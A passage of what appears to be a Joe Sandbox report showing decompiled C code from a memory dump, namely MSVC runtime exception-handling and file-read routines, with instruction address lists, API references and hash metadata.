													_t209 = _t209 + 2;
													__eflags = _t274;
													if(_t274 != 0) {
														continue;
													} else {
														goto L97;
													}
												}
											}
											L99:
											__eflags = _t210;
											if(_t210 == 0) {
												goto L101;
											} else {
												_t207 = 0;
											}
											goto L110;
										}
										asm("sbb eax, eax");
										_t210 = _t209 | 0x00000001;
										__eflags = _t210;
										goto L99;
									}
								} else {
									__eflags =  *_t304 & 0x00000010;
									if(( *_t304 & 0x00000010) != 0) {
										goto L109;
									} else {
										goto L91;
									}
								}
							}
						}
						L110:
						return _t207;
					}
				} else {
					_t270 = _a4;
					if( *_t270 != 0xe06d7363 || _t270[0x10] != 3 || _t270[0x14] != 0x19930520 && _t270[0x14] != 0x19930521 && _t270[0x14] != 0x19930522) {
						L22:
						_t296 = _a12;
						_v8 = _t296;
						goto L24;
					} else {
						_t315 = 0;
						if(_t270[0x1c] != 0) {
							goto L22;
						} else {
							_t224 = E0137B22C(_t270, _t275, _t296, _t301, 0);
							if( *((intOrPtr*)(_t224 + 0x10)) == 0) {
								L61:
								return _t224;
							} else {
								_t270 =  *(E0137B22C(_t270, _t275, _t296, _t301, 0) + 0x10);
								_t259 = E0137B22C(_t270, _t275, _t296, _t301, 0);
								_v28 = 1;
								_v8 =  *((intOrPtr*)(_t259 + 0x14));
								if(_t270 == 0 ||  *_t270 == 0xe06d7363 && _t270[0x10] == 3 && (_t270[0x14] == 0x19930520 || _t270[0x14] == 0x19930521 || _t270[0x14] == 0x19930522) && _t270[0x1c] == _t315) {
									goto L67;
								} else {
									if( *((intOrPtr*)(E0137B22C(_t270, _t275, _t296, _t301, _t315) + 0x1c)) == _t315) {
										L23:
										_t296 = _v8;
										_t275 = _v12;
										L24:
										_v52 = _t301;
										_v48 = 0;
										__eflags =  *_t270 - 0xe06d7363;
										if( *_t270 != 0xe06d7363) {
											L57:
											__eflags = _t301[3];
											if(_t301[3] <= 0) {
												goto L60;
											} else {
												__eflags = _a24;
												if(_a24 != 0) {
													goto L67;
												} else {
													_push(_a32);
													_push(_a28);
													_push(_t275);
													_push(_t301);
													_push(_a16);
													_push(_t296);
													_push(_a8);
													_push(_t270);
													L68();
													_t332 = _t332 + 0x20;
													goto L60;
												}
											}
										} else {
											__eflags = _t270[0x10] - 3;
											if(_t270[0x10] != 3) {
												goto L57;
											} else {
												__eflags = _t270[0x14] - 0x19930520;
												if(_t270[0x14] == 0x19930520) {
													L29:
													_t315 = _a32;
													__eflags = _t301[3];
													if(_t301[3] > 0) {
														_push(_a28);
														E013793F9(_t270, _t275, _t301, _t315,  &_v68,  &_v52, _t275, _a16, _t301);
														_t296 = _v64;
														_t332 = _t332 + 0x18;
														_t247 = _v68;
														_v44 = _t247;
														_v16 = _t296;
														__eflags = _t296 - _v56;
														if(_t296 < _v56) {
															_t290 = _t296 * 0x14;
															__eflags = _t290;
															_v32 = _t290;
															do {
																_t291 = 5;
																_t250 = memcpy( &_v104,  *((intOrPtr*)( *_t247 + 0x10)) + _t290, _t291 << 2);
																_t332 = _t332 + 0xc;
																__eflags = _v104 - _t250;
																if(_v104 <= _t250) {
																	__eflags = _t250 - _v100;
																	if(_t250 <= _v100) {
																		_t294 = 0;
																		_v20 = 0;
																		__eflags = _v92;
																		if(_v92 != 0) {
																			_t299 = _t270[0x1c];
																			_t251 =  *((intOrPtr*)(_t299 + 0xc));
																			_t252 = _t251 + 4;
																			__eflags = _t252;
																			_v36 = _t252;
																			_t253 = _v88;
																			_v40 =  *_t251;
																			_v24 = _t253;
																			do {
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				_t327 = _v40;
																				_t314 = _v36;
																				__eflags = _t327;
																				if(_t327 <= 0) {
																					goto L40;
																				} else {
																					while(1) {
																						_push(_t299);
																						_push( *_t314);
																						_t254 =  &_v84;
																						_push(_t254);
																						L87();
																						_t332 = _t332 + 0xc;
																						__eflags = _t254;
																						if(_t254 != 0) {
																							break;
																						}
																						_t299 = _t270[0x1c];
																						_t327 = _t327 - 1;
																						_t314 = _t314 + 4;
																						__eflags = _t327;
																						if(_t327 > 0) {
																							continue;
																						} else {
																							_t294 = _v20;
																							_t253 = _v24;
																							goto L40;
																						}
																						goto L43;
																					}
																					_push(_a24);
																					_push(_v28);
																					E0137B528(_t299, _t270, _a8, _v8, _a16, _a20,  &_v84,  *_t314,  &_v104, _a28, _a32);
																					_t332 = _t332 + 0x30;
																				}
																				L43:
																				_t296 = _v16;
																				goto L44;
																				L40:
																				_t294 = _t294 + 1;
																				_t253 = _t253 + 0x10;
																				_v20 = _t294;
																				_v24 = _t253;
																				__eflags = _t294 - _v92;
																			} while (_t294 != _v92);
																			goto L43;
																		}
																	}
																}
																L44:
																_t296 = _t296 + 1;
																_t247 = _v44;
																_t290 = _v32 + 0x14;
																_v16 = _t296;
																_v32 = _t290;
																__eflags = _t296 - _v56;
															} while (_t296 < _v56);
															_t301 = _a20;
															_t315 = _a32;
														}
													}
													__eflags = _a24;
													if(__eflags != 0) {
														_push(1);
														E013797C3(_t270, _t301, _t315, __eflags);
														_t275 = _t270;
													}
													__eflags = ( *_t301 & 0x1fffffff) - 0x19930521;
													if(( *_t301 & 0x1fffffff) < 0x19930521) {
														L60:
														_t224 = E0137B22C(_t270, _t275, _t296, _t301, _t315);
														__eflags =  *(_t224 + 0x1c);
														if( *(_t224 + 0x1c) != 0) {
															goto L67;
														} else {
															goto L61;
														}
													} else {
														_t228 = _t301[8] >> 2;
														__eflags = _t301[7];
														if(_t301[7] != 0) {
															__eflags = _t228 & 0x00000001;
															if((_t228 & 0x00000001) == 0) {
																_push(_t301[7]);
																_t229 = E0137BFBD(_t270, _t301, _t315, _t270);
																_pop(_t275);
																__eflags = _t229;
																if(_t229 == 0) {
																	goto L64;
																} else {
																	goto L60;
																}
															} else {
																goto L54;
															}
														} else {
															__eflags = _t228 & 0x00000001;
															if((_t228 & 0x00000001) == 0) {
																goto L60;
															} else {
																__eflags = _a28;
																if(_a28 != 0) {
																	goto L60;
																} else {
																	L54:
																	 *(E0137B22C(_t270, _t275, _t296, _t301, _t315) + 0x10) = _t270;
																	_t237 = E0137B22C(_t270, _t275, _t296, _t301, _t315);
																	_t286 = _v8;
																	 *((intOrPtr*)(_t237 + 0x14)) = _v8;
																	goto L62;
																}
															}
														}
													}
												} else {
													__eflags = _t270[0x14] - 0x19930521;
													if(_t270[0x14] == 0x19930521) {
														goto L29;
													} else {
														__eflags = _t270[0x14] - 0x19930522;
														if(_t270[0x14] != 0x19930522) {
															goto L57;
														} else {
															goto L29;
														}
													}
												}
											}
										}
									} else {
										_v16 =  *((intOrPtr*)(E0137B22C(_t270, _t275, _t296, _t301, _t315) + 0x1c));
										_t264 = E0137B22C(_t270, _t275, _t296, _t301, _t315);
										_push(_v16);
										 *(_t264 + 0x1c) = _t315;
										_t265 = E0137BFBD(_t270, _t301, _t315, _t270);
										_pop(_t286);
										if(_t265 != 0) {
											goto L23;
										} else {
											_t301 = _v16;
											_t353 =  *_t301 - _t315;
											if( *_t301 <= _t315) {
												L62:
												E013850FC(_t270, _t286, _t296, _t301, _t315, __eflags);
											} else {
												while(1) {
													_t286 =  *((intOrPtr*)(_t315 + _t301[1] + 4));
													if(E0137BC46( *((intOrPtr*)(_t315 + _t301[1] + 4)), _t353, 0x14a4e4c) != 0) {
														goto L63;
													}
													_t315 = _t315 + 0x10;
													_t269 = _v20 + 1;
													_v20 = _t269;
													_t353 = _t269 -  *_t301;
													if(_t269 >=  *_t301) {
														goto L62;
													} else {
														continue;
													}
													goto L63;
												}
											}
											L63:
											_push(1);
											_push(_t270);
											E013797C3(_t270, _t301, _t315, __eflags);
											_t275 =  &_v64;
											E0137BC2E( &_v64);
											E0137938D( &_v64, 0x13a21a4);
											L64:
											 *(E0137B22C(_t270, _t275, _t296, _t301, _t315) + 0x10) = _t270;
											_t231 = E0137B22C(_t270, _t275, _t296, _t301, _t315);
											_t275 = _v8;
											 *(_t231 + 0x14) = _v8;
											__eflags = _t315;
											if(_t315 == 0) {
												_t315 = _a8;
											}
											E013795EC(_t275, _t315, _t270);
											E0137BEBD(_a8, _a16, _t301);
											_t234 = E0137C07A(_t301);
											_t332 = _t332 + 0x10;
											_push(_t234);
											E0137BE34(_t270, _t275, _t296, _t301, _t315, __eflags);
											goto L67;
										}
									}
								}
							}
						}
					}
				}
			}

0x0137b5a8
0x0137b5af
0x0137b5b1
0x0137b5ba
0x0137b5c0
0x0137b5c8
0x0137b5ca
0x0137b5cd
0x0137b5d3
0x0137b947
0x0137b947
0x0137b94c
0x0137b94e
0x0137b950
0x0137b953
0x0137b954
0x0137b957
0x0137b95d
0x0137ba7c
0x0137b963
0x0137b965
0x0137b96c
0x0137b96f
0x0137b972
0x0137b978
0x0137b97a
0x0137b97f
0x0137b982
0x0137b984
0x0137b98a
0x0137b98c
0x0137b992
0x0137b9a7
0x0137b9ac
0x0137b9af
0x0137b9b1
0x0137ba78
0x00000000
0x0137ba79
0x0137b9b1
0x0137b992
0x0137b98a
0x0137b982
0x0137b9b7
0x0137b9ba
0x0137b9bd
0x0137b9c0
0x0137b9c3
0x0137b9c9
0x0137b9db
0x0137b9e0
0x0137b9e3
0x0137b9e6
0x0137b9e9
0x0137b9ec
0x0137b9ef
0x0137b9f2
0x00000000
0x00000000
0x0137b9f8
0x0137b9f8
0x0137b9fb
0x0137b9fe
0x0137ba0d
0x0137ba0e
0x0137ba0e
0x0137ba10
0x0137ba13
0x00000000
0x00000000
0x0137ba15
0x0137ba18
0x00000000
0x00000000
0x0137ba26
0x0137ba28
0x0137ba2b
0x0137ba2d
0x0137ba35
0x0137ba35
0x0137ba38
0x0137ba3a
0x0137ba3c
0x0137ba58
0x0137ba5d
0x0137ba60
0x0137ba60
0x00000000
0x0137ba38
0x0137ba2f
0x0137ba33
0x00000000
0x00000000
0x00000000
0x0137ba63
0x0137ba66
0x0137ba67
0x0137ba6a
0x0137ba6d
0x0137ba70
0x0137ba73
0x0137ba73
0x00000000
0x0137b9fe
0x0137ba7d
0x0137ba82
0x0137ba83
0x0137ba86
0x0137ba89
0x0137ba8a
0x0137ba8b
0x0137ba8c
0x0137ba8f
0x0137ba91
0x0137bb09
0x0137bb0b
0x0137bb0b
0x0137ba93
0x0137ba93
0x0137ba96
0x0137ba99
0x00000000
0x0137ba9b
0x0137ba9b
0x0137ba9e
0x0137baa1
0x0137baa8
0x0137baa8
0x0137baab
0x0137baad
0x0137baaf
0x0137bae1
0x0137bae1
0x0137bae4
0x0137baeb
0x0137baeb
0x0137baee
0x0137baf1
0x0137baf8
0x0137baf8
0x0137bafb
0x0137bb02
0x0137bb04
0x0137bb04
0x0137bafd
0x0137bafd
0x0137bb00
0x00000000
0x00000000
0x0137bb00
0x0137baf3
0x0137baf3
0x0137baf6
0x00000000
0x00000000
0x0137baf6
0x0137bae6
0x0137bae6
0x0137bae9
0x00000000
0x00000000
0x0137bae9
0x0137bb05
0x0137bab1
0x0137bab1
0x0137bab1
0x0137bab4
0x0137bab4
0x0137bab6
0x0137bab8
0x00000000
0x00000000
0x0137baba
0x0137babc
0x0137bad0
0x0137bad0
0x0137babe
0x0137babe
0x0137bac1
0x0137bac4
0x00000000
0x0137bac6
0x0137bac6
0x0137bac9
0x0137bacc
0x0137bace
0x00000000
0x00000000
0x00000000
0x00000000
0x0137bace
0x0137bac4
0x0137bad9
0x0137bad9
0x0137badb
0x00000000
0x0137badd
0x0137badd
0x0137badd
0x00000000
0x0137badb
0x0137bad4
0x0137bad6
0x0137bad6
0x00000000
0x0137bad6
0x0137baa3
0x0137baa3
0x0137baa6
0x00000000
0x00000000
0x00000000
0x00000000
0x0137baa6
0x0137baa1
0x0137ba99
0x0137bb0c
0x0137bb10
0x0137bb10
0x0137b5e2
0x0137b5e2
0x0137b5eb
0x0137b6e8
0x0137b6e8
0x0137b6eb
0x00000000
0x0137b61a
0x0137b61a
0x0137b61f
0x00000000
0x0137b625
0x0137b625
0x0137b62d
0x0137b8e1
0x0137b8e5
0x0137b633
0x0137b638
0x0137b63b
0x0137b640
0x0137b647
0x0137b64c
0x00000000
0x0137b684
0x0137b68c
0x0137b6f0
0x0137b6f0
0x0137b6f3
0x0137b6f6
0x0137b6f8
0x0137b6fb
0x0137b6fe
0x0137b704
0x0137b8b0
0x0137b8b0
0x0137b8b3
0x00000000
0x0137b8b5
0x0137b8b5
0x0137b8b8
0x00000000
0x0137b8be
0x0137b8be
0x0137b8c1
0x0137b8c4
0x0137b8c5
0x0137b8c6
0x0137b8c9
0x0137b8ca
0x0137b8cd
0x0137b8ce
0x0137b8d3
0x00000000
0x0137b8d3
0x0137b8b8
0x0137b70a
0x0137b70a
0x0137b70e
0x00000000
0x0137b714
0x0137b714
0x0137b71b
0x0137b733
0x0137b733
0x0137b736
0x0137b739
0x0137b73f
0x0137b74f
0x0137b754
0x0137b757
0x0137b75a
0x0137b75d
0x0137b760
0x0137b763
0x0137b766
0x0137b76c
0x0137b76c
0x0137b76f
0x0137b772
0x0137b781
0x0137b782
0x0137b782
0x0137b784
0x0137b787
0x0137b78d
0x0137b790
0x0137b796
0x0137b798
0x0137b79b
0x0137b79e
0x0137b7a4
0x0137b7a7
0x0137b7ac
0x0137b7ac
0x0137b7af
0x0137b7b2
0x0137b7b5
0x0137b7b8
0x0137b7bb
0x0137b7c0
0x0137b7c1
0x0137b7c2
0x0137b7c3
0x0137b7c4
0x0137b7c7
0x0137b7ca
0x0137b7cc
0x00000000
0x0137b7ce
0x0137b7ce
0x0137b7ce
0x0137b7cf
0x0137b7d1
0x0137b7d4
0x0137b7d5
0x0137b7da
0x0137b7dd
0x0137b7df
0x00000000
0x00000000
0x0137b7e1
0x0137b7e4
0x0137b7e5
0x0137b7e8
0x0137b7ea
0x00000000
0x0137b7ec
0x0137b7ec
0x0137b7ef
0x00000000
0x0137b7ef
0x00000000
0x0137b7ea
0x0137b803
0x0137b809
0x0137b826
0x0137b82b
0x0137b82b
0x0137b82e
0x0137b82e
0x00000000
0x0137b7f2
0x0137b7f2
0x0137b7f3
0x0137b7f6
0x0137b7f9
0x0137b7fc
0x0137b7fc
0x00000000
0x0137b801
0x0137b79e
0x0137b790
0x0137b831
0x0137b834
0x0137b835
0x0137b838
0x0137b83b
0x0137b83e
0x0137b841
0x0137b841
0x0137b84a
0x0137b84d
0x0137b84d
0x0137b766
0x0137b850
0x0137b854
0x0137b856
0x0137b859
0x0137b85f
0x0137b85f
0x0137b867
0x0137b86c
0x0137b8d6
0x0137b8d6
0x0137b8db
0x0137b8df
0x00000000
0x00000000
0x00000000
0x00000000
0x0137b86e
0x0137b871
0x0137b874
0x0137b878
0x0137b886
0x0137b888
0x0137b89f
0x0137b8a3
0x0137b8a9
0x0137b8aa
0x0137b8ac
0x00000000
0x0137b8ae
0x00000000
0x0137b8ae
0x00000000
0x00000000
0x00000000
0x0137b87a
0x0137b87a
0x0137b87c
0x00000000
0x0137b87e
0x0137b87e
0x0137b882
0x00000000
0x0137b884
0x0137b88a
0x0137b88f
0x0137b892
0x0137b897
0x0137b89a
0x00000000
0x0137b89a
0x0137b882
0x0137b87c
0x0137b878
0x0137b71d
0x0137b71d
0x0137b724
0x00000000
0x0137b726
0x0137b726
0x0137b72d
0x00000000
0x00000000
0x00000000
0x00000000
0x0137b72d
0x0137b724
0x0137b71b
0x0137b70e
0x0137b68e
0x0137b696
0x0137b699
0x0137b69e
0x0137b6a2
0x0137b6a5
0x0137b6ab
0x0137b6ae
0x00000000
0x0137b6b0
0x0137b6b0
0x0137b6b3
0x0137b6b5
0x0137b8e6
0x0137b8e6
0x00000000
0x0137b6bb
0x0137b6c3
0x0137b6ce
0x00000000
0x00000000
0x0137b6d7
0x0137b6da
0x0137b6db
0x0137b6de
0x0137b6e0
0x00000000
0x0137b6e6
0x00000000
0x0137b6e6
0x00000000
0x0137b6e0
0x0137b6bb
0x0137b8eb
0x0137b8eb
0x0137b8ed
0x0137b8ee
0x0137b8f5
0x0137b8f8
0x0137b906
0x0137b90b
0x0137b910
0x0137b913
0x0137b918
0x0137b91b
0x0137b91e
0x0137b920
0x0137b922
0x0137b922
0x0137b927
0x0137b933
0x0137b939
0x0137b93e
0x0137b941
0x0137b942
0x00000000
0x0137b942
0x0137b6ae
0x0137b68c
0x0137b64c
0x0137b62d
0x0137b61f
0x0137b5eb

APIs

type_info::operator==.LIBVCRUNTIME ref: 0137B6C7
___TypeMatch.LIBVCRUNTIME ref: 0137B7D5
CatchIt.LIBVCRUNTIME ref: 0137B826
_UnwindNestedFrames.LIBCMT ref: 0137B927
CallUnexpected.LIBVCRUNTIME ref: 0137B942

Strings

csm, xrefs: 0137B652
csm, xrefs: 0137B6FE
csm, xrefs: 0137B5E5

Memory Dump Source

Source File: 00000002.00000002.281026800.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true

Associated: 00000002.00000002.280939181.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281545635.0000000001394000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281900158.00000000013A3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.284995880.00000000014A4000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285035285.00000000014A5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285069288.00000000014A7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1370000_321.jbxd

Similarity

API ID: CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 4119006552-393685449
Opcode ID: bd06edf76697c137ed8ef520961243252516162818997a000af70da370f16444
Instruction ID: 57269baba9a98f90596fe9774b48772f1ff851fc92b1d82270b7b622af73a06f
Opcode Fuzzy Hash: bd06edf76697c137ed8ef520961243252516162818997a000af70da370f16444
Instruction Fuzzy Hash: F9B17D7180024AEFCF35DFA8D8809AEFBB5FF14328B15415AE910AB219D739DA51CF91

Uniqueness

Uniqueness Score: -1.00%

Function 013911D9 Relevance: 13.8, APIs: 9, Instructions: 301
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E013911D9(signed int _a4, void* _a8, unsigned int _a12) {
				char _v5;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				void* _v24;
				void* _v28;
				long _v32;
				char _v36;
				void* _v40;
				long _v44;
				signed int* _t137;
				signed int _t139;
				intOrPtr _t143;
				unsigned int _t154;
				intOrPtr _t158;
				signed int _t160;
				signed int _t163;
				long _t164;
				intOrPtr _t169;
				signed int _t170;
				intOrPtr _t172;
				signed int _t174;
				signed int _t178;
				void _t180;
				char _t185;
				char _t190;
				signed int _t198;
				signed int _t199;
				signed int _t200;
				signed int _t207;
				long _t210;
				unsigned int _t212;
				intOrPtr _t214;
				unsigned int _t217;
				signed int _t219;
				signed int _t220;
				signed int _t221;
				signed int _t222;
				signed char _t224;
				char _t226;
				signed int _t228;
				void* _t229;
				signed int _t230;
				char* _t231;
				char* _t232;
				signed int _t235;
				signed int _t236;
				void* _t240;
				void* _t242;
				void* _t243;

				_t198 = _a4;
				_t246 = _t198 - 0xfffffffe;
				if(_t198 != 0xfffffffe) {
					__eflags = _t198;
					if(__eflags < 0) {
						L59:
						_t137 = E0137FD11(__eflags);
						 *_t137 =  *_t137 & 0x00000000;
						__eflags =  *_t137;
						 *((intOrPtr*)(E0137FD24( *_t137))) = 9;
						L60:
						_t139 = E0138013F();
						goto L61;
					}
					__eflags = _t198 -  *0x14a6018;
					if(__eflags >= 0) {
						goto L59;
					}
					_t207 = _t198 >> 6;
					_t235 = (_t198 & 0x0000003f) * 0x38;
					_v12 = _t207;
					_t143 =  *((intOrPtr*)(0x14a5e18 + _t207 * 4));
					_v20 = _t235;
					_v36 = 1;
					_t224 =  *((intOrPtr*)(_t143 + _t235 + 0x28));
					__eflags = 1 & _t224;
					if(__eflags == 0) {
						goto L59;
					}
					_t210 = _a12;
					__eflags = _t210 - 0x7fffffff;
					if(__eflags <= 0) {
						__eflags = _t210;
						if(_t210 == 0) {
							L58:
							return 0;
						}
						__eflags = _t224 & 0x00000002;
						if((_t224 & 0x00000002) != 0) {
							goto L58;
						}
						__eflags = _a8;
						if(__eflags == 0) {
							goto L6;
						}
						_v28 =  *((intOrPtr*)(_t143 + _t235 + 0x18));
						_t226 =  *((intOrPtr*)(_t143 + _t235 + 0x29));
						_v5 = _t226;
						_t240 = 0;
						_t228 = _t226 - 1;
						__eflags = _t228;
						if(_t228 == 0) {
							__eflags =  !_t210 & 0x00000001;
							if(__eflags == 0) {
								L14:
								 *(E0137FD11(__eflags)) =  *_t149 & _t240;
								 *((intOrPtr*)(E0137FD24(__eflags))) = 0x16;
								E0138013F();
								goto L39;
							} else {
								_t154 = 4;
								_t212 = _t210 >> 1;
								_v16 = _t154;
								__eflags = _t212 - _t154;
								if(_t212 >= _t154) {
									_t154 = _t212;
									_v16 = _t212;
								}
								_t240 = E0138871A(_t154);
								E013871B2(0);
								E013871B2(0);
								_t243 = _t242 + 0xc;
								_v24 = _t240;
								__eflags = _t240;
								if(__eflags != 0) {
									_t158 = E0138B030(_t198, 0, 0, 1);
									_t242 = _t243 + 0x10;
									_t214 =  *((intOrPtr*)(0x14a5e18 + _v12 * 4));
									 *((intOrPtr*)(_t235 + _t214 + 0x20)) = _t158;
									 *(_t235 + _t214 + 0x24) = _t228;
									_t229 = _t240;
									_t210 = _v16;
									_t143 =  *((intOrPtr*)(0x14a5e18 + _v12 * 4));
									L22:
									_t199 = _v20;
									_t235 = 0;
									_v40 = _t229;
									__eflags =  *(_t199 + _t143 + 0x28) & 0x00000048;
									_t200 = _a4;
									if(( *(_t199 + _t143 + 0x28) & 0x00000048) != 0) {
										_t180 =  *((intOrPtr*)(_v20 + _t143 + 0x2a));
										_t200 = _a4;
										__eflags = _t180 - 0xa;
										if(_t180 != 0xa) {
											__eflags = _t210;
											if(_t210 != 0) {
												_t235 = 1;
												 *_t229 = _t180;
												_t231 = _t229 + 1;
												_t220 = _t210 - 1;
												__eflags = _v5;
												_v24 = _t231;
												_v16 = _t220;
												 *((char*)(_v20 +  *((intOrPtr*)(0x14a5e18 + _v12 * 4)) + 0x2a)) = 0xa;
												_t200 = _a4;
												if(_v5 != 0) {
													_t185 =  *((intOrPtr*)(_v20 +  *((intOrPtr*)(0x14a5e18 + _v12 * 4)) + 0x2b));
													_t200 = _a4;
													__eflags = _t185 - 0xa;
													if(_t185 != 0xa) {
														__eflags = _t220;
														if(_t220 != 0) {
															 *_t231 = _t185;
															_t232 = _t231 + 1;
															_t221 = _t220 - 1;
															__eflags = _v5 - 1;
															_v24 = _t232;
															_t235 = 2;
															_v16 = _t221;
															 *((char*)(_v20 +  *((intOrPtr*)(0x14a5e18 + _v12 * 4)) + 0x2b)) = 0xa;
															_t200 = _a4;
															if(_v5 == 1) {
																_t190 =  *((intOrPtr*)(_v20 +  *((intOrPtr*)(0x14a5e18 + _v12 * 4)) + 0x2c));
																_t200 = _a4;
																__eflags = _t190 - 0xa;
																if(_t190 != 0xa) {
																	__eflags = _t221;
																	if(_t221 != 0) {
																		 *_t232 = _t190;
																		_t222 = _t221 - 1;
																		__eflags = _t222;
																		_v16 = _t222;
																		_v24 = _t232 + 1;
																		_t235 = 3;
																		 *((char*)(_v20 +  *((intOrPtr*)(0x14a5e18 + _v12 * 4)) + 0x2c)) = 0xa;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
									_t160 = E0139165E(_t200);
									__eflags = _t160;
									if(_t160 == 0) {
										L42:
										_v36 = 0;
										L43:
										_t163 = ReadFile(_v28, _v24, _v16,  &_v32, 0);
										__eflags = _t163;
										if(_t163 == 0) {
											L54:
											_t164 = GetLastError();
											_t235 = 5;
											__eflags = _t164 - _t235;
											if(__eflags != 0) {
												__eflags = _t164 - 0x6d;
												if(_t164 != 0x6d) {
													L38:
													E0137FCEE(_t164);
													goto L39;
												}
												_t236 = 0;
												goto L40;
											}
											 *((intOrPtr*)(E0137FD24(__eflags))) = 9;
											 *(E0137FD11(__eflags)) = _t235;
											goto L39;
										}
										_t217 = _a12;
										__eflags = _v32 - _t217;
										if(_v32 > _t217) {
											goto L54;
										}
										_t236 = _t235 + _v32;
										__eflags = _t236;
										L46:
										_t230 = _v20;
										_t169 =  *((intOrPtr*)(0x14a5e18 + _v12 * 4));
										__eflags =  *((char*)(_t230 + _t169 + 0x28));
										if( *((char*)(_t230 + _t169 + 0x28)) < 0) {
											__eflags = _v5 - 2;
											if(_v5 == 2) {
												__eflags = _v36;
												_push(_t236 >> 1);
												_push(_v40);
												_push(_t200);
												if(_v36 == 0) {
													_t170 = E01390D44();
												} else {
													_t170 = E0139104A();
												}
											} else {
												_t218 = _t217 >> 1;
												__eflags = _t217 >> 1;
												_t170 = E01390EF3(_t217 >> 1, _t217 >> 1, _t200, _v24, _t236, _a8, _t218);
											}
											_t236 = _t170;
										}
										goto L40;
									}
									_t219 = _v20;
									_t172 =  *((intOrPtr*)(0x14a5e18 + _v12 * 4));
									__eflags =  *((char*)(_t219 + _t172 + 0x28));
									if( *((char*)(_t219 + _t172 + 0x28)) >= 0) {
										goto L42;
									}
									_t174 = GetConsoleMode(_v28,  &_v44);
									__eflags = _t174;
									if(_t174 == 0) {
										goto L42;
									}
									__eflags = _v5 - 2;
									if(_v5 != 2) {
										goto L43;
									}
									_t178 = ReadConsoleW(_v28, _v24, _v16 >> 1,  &_v32, 0);
									__eflags = _t178;
									if(_t178 != 0) {
										_t217 = _a12;
										_t236 = _t235 + _v32 * 2;
										goto L46;
									}
									_t164 = GetLastError();
									goto L38;
								} else {
									 *((intOrPtr*)(E0137FD24(__eflags))) = 0xc;
									 *(E0137FD11(__eflags)) = 8;
									L39:
									_t236 = _t235 | 0xffffffff;
									__eflags = _t236;
									L40:
									E013871B2(_t240);
									return _t236;
								}
							}
						}
						__eflags = _t228 == 1;
						if(_t228 == 1) {
							__eflags =  !_t210 & 0x00000001;
							if(__eflags != 0) {
								_t229 = _a8;
								_v16 = _t210;
								_v24 = _t229;
								_t143 =  *((intOrPtr*)(0x14a5e18 + _v12 * 4));
								goto L22;
							}
							goto L14;
						} else {
							_t229 = _a8;
							_v16 = _t210;
							_v24 = _t229;
							goto L22;
						}
					}
					L6:
					 *(E0137FD11(__eflags)) =  *_t145 & 0x00000000;
					 *((intOrPtr*)(E0137FD24(__eflags))) = 0x16;
					goto L60;
				} else {
					 *(E0137FD11(_t246)) =  *_t197 & 0x00000000;
					_t139 = E0137FD24(_t246);
					 *_t139 = 9;
					L61:
					return _t139 | 0xffffffff;
				}
			}

0x013911e2
0x013911e6
0x013911e9
0x01391203
0x01391205
0x0139156a
0x0139156a
0x0139156f
0x0139156f
0x01391577
0x0139157d
0x0139157d
0x00000000
0x0139157d
0x0139120b
0x01391211
0x00000000
0x00000000
0x0139121b
0x01391221
0x01391224
0x01391227
0x01391231
0x01391234
0x01391237
0x0139123b
0x0139123d
0x00000000
0x00000000
0x01391243
0x01391246
0x0139124c
0x01391266
0x01391268
0x01391566
0x00000000
0x01391566
0x0139126e
0x01391271
0x00000000
0x00000000
0x01391277
0x0139127b
0x00000000
0x00000000
0x01391281
0x01391284
0x01391288
0x0139128f
0x01391291
0x01391291
0x01391294
0x013912e9
0x013912eb
0x013912b1
0x013912b6
0x013912bd
0x013912c3
0x00000000
0x013912ed
0x013912ef
0x013912f0
0x013912f2
0x013912f5
0x013912f7
0x013912f9
0x013912fb
0x013912fb
0x01391306
0x01391308
0x0139130f
0x01391314
0x01391317
0x0139131a
0x0139131c
0x01391340
0x01391348
0x0139134b
0x01391352
0x01391359
0x0139135d
0x0139135f
0x01391362
0x01391369
0x01391369
0x0139136c
0x0139136e
0x01391371
0x01391376
0x01391379
0x01391382
0x01391386
0x01391389
0x0139138b
0x01391391
0x01391393
0x0139139c
0x0139139d
0x0139139f
0x013913a3
0x013913a4
0x013913a8
0x013913ab
0x013913b5
0x013913ba
0x013913bd
0x013913cc
0x013913d0
0x013913d3
0x013913d5
0x013913d7
0x013913d9
0x013913de
0x013913e0
0x013913e4
0x013913e5
0x013913eb
0x013913f5
0x013913f6
0x013913f9
0x013913fe
0x01391401
0x01391410
0x01391414
0x01391417
0x01391419
0x0139141b
0x0139141d
0x0139141f
0x01391425
0x01391425
0x01391426
0x01391435
0x01391438
0x01391439
0x01391439
0x0139141d
0x01391419
0x01391401
0x013913d9
0x013913d5
0x013913bd
0x01391393
0x0139138b
0x0139143f
0x01391445
0x01391447
0x013914ba
0x013914ba
0x013914be
0x013914ce
0x013914d4
0x013914d6
0x01391532
0x01391532
0x0139153a
0x0139153b
0x0139153d
0x01391556
0x01391559
0x01391496
0x01391497
0x00000000
0x0139149c
0x0139155f
0x00000000
0x0139155f
0x01391544
0x0139154f
0x00000000
0x0139154f
0x013914d8
0x013914db
0x013914de
0x00000000
0x00000000
0x013914e0
0x013914e0
0x013914e3
0x013914e6
0x013914e9
0x013914f0
0x013914f5
0x013914f7
0x013914fb
0x01391516
0x0139151a
0x0139151b
0x0139151e
0x0139151f
0x0139152b
0x01391521
0x01391521
0x01391521
0x013914fd
0x013914fd
0x013914fd
0x01391508
0x0139150d
0x01391510
0x01391510
0x00000000
0x013914f5
0x0139144c
0x0139144f
0x01391456
0x0139145b
0x00000000
0x00000000
0x01391464
0x0139146a
0x0139146c
0x00000000
0x00000000
0x0139146e
0x01391472
0x00000000
0x00000000
0x01391486
0x0139148c
0x0139148e
0x013914b2
0x013914b5
0x00000000
0x013914b5
0x01391490
0x00000000
0x0139131e
0x01391323
0x0139132e
0x0139149d
0x0139149d
0x0139149d
0x013914a0
0x013914a1
